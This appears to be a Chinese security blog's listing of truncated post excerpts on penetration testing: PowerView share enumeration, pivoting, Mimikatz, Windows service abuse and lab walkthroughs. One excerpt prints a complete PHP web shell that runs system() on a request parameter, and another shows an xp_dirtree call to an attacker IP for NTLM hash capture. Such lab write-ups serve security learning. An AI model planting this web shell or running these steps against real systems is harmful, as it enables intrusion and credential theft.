我 们 将 使 用 PowerView 的 Find-DomainShare 功 能 来 查 找 域 中 的 共 享 。 我 们 还 可 以 添 加 -CheckShareAccess 标志来显示仅供我们使用的共享。但是，我们现在将跳过此标志以返回...

查看网卡信息有几块网卡，这些网卡所连接的网络。以这台主机为pivot（枢钮）进而去打进（入侵）内网（其他网络）命令：/sbin/ifconfig -a-a查看所有的网络连接（包括非活动的）网卡相关的配置文...

simple-backdoor.php<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; } ?>使用方法:Usage: http://target...

1. Mimikatz介绍作者：Benjamin DelpyBeniamin Delpy最初创建 Mimikatz是为了向微软证明其身份验证协议容易受到攻击然而，这个工具在20之后仍然被广泛用于网络安全行业这个工具也是世界上最好的...

Windows系统中的服务就像Linux系统中的守护进程。它们在后台运行任务，大多数情况下，它们使用SYSTEM特权执行（为我们提供了另一种实现系统shell的方法）。 1.对服务的管理scsc qc [service na...

简介ChatterboxDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.74 Windows 1. 信息收集9225和9226都是开启的 且是AChat System http服务 2. 漏洞挖掘与利用访问9255...

简介GrannyDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.15 Windows 1. 信息收集收集受害者服务详情nmap -p- -T5 -n -vvv -oA Granny -noscript 10.10.10.15IIS 6.0...

简介point 10PCDifficulty INTERMEDIATErated by community INTERMEDIAT 实验环境攻击者 Kali 192.168.45.206受害者 IP 192.168.169.210  Linux 1. 信息收集收集受害者服务详情nmap -sV -A 1...

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...

1. 查看用户家目录中有没有任何感兴趣的文件 能否访问ls -ahlR /root/ ls -ahlR /home/ -R 递归显示 -h 以可读的方式显示文件大小 Tips: 默认情况下，用户的家目录是位于/home目录下 2. 关于密...